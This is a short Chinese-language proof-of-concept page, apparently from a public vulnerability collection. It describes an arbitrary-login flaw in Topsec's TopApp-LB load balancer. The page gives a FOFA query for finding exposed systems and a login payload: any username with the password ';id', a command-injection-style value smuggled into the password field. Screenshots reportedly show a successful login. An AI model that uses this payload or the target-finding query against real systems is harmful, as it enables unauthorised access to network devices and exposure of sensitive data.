Awesome-POC/Web应用漏洞/天融信 TopApp-LB系统 任意登陆.md

33 lines
528 B
Markdown
Raw Normal View History

2022-05-17 17:43:20 +08:00
# 天融信 TopApp-LB系统 任意登陆
## 漏洞描述
天融信负载均衡TopApp-LB系统无需密码可直接登陆查看敏感信息
## 影响版本
```
天融信负载均衡TopApp-LB
```
## FOFA
```
app="天融信-TopApp-LB-负载均衡系统"
```
## 漏洞复现
在登录页面中输入,账号:**任意账号** 密码:**;id**
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091919361.png)
成功登录
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091919022.png)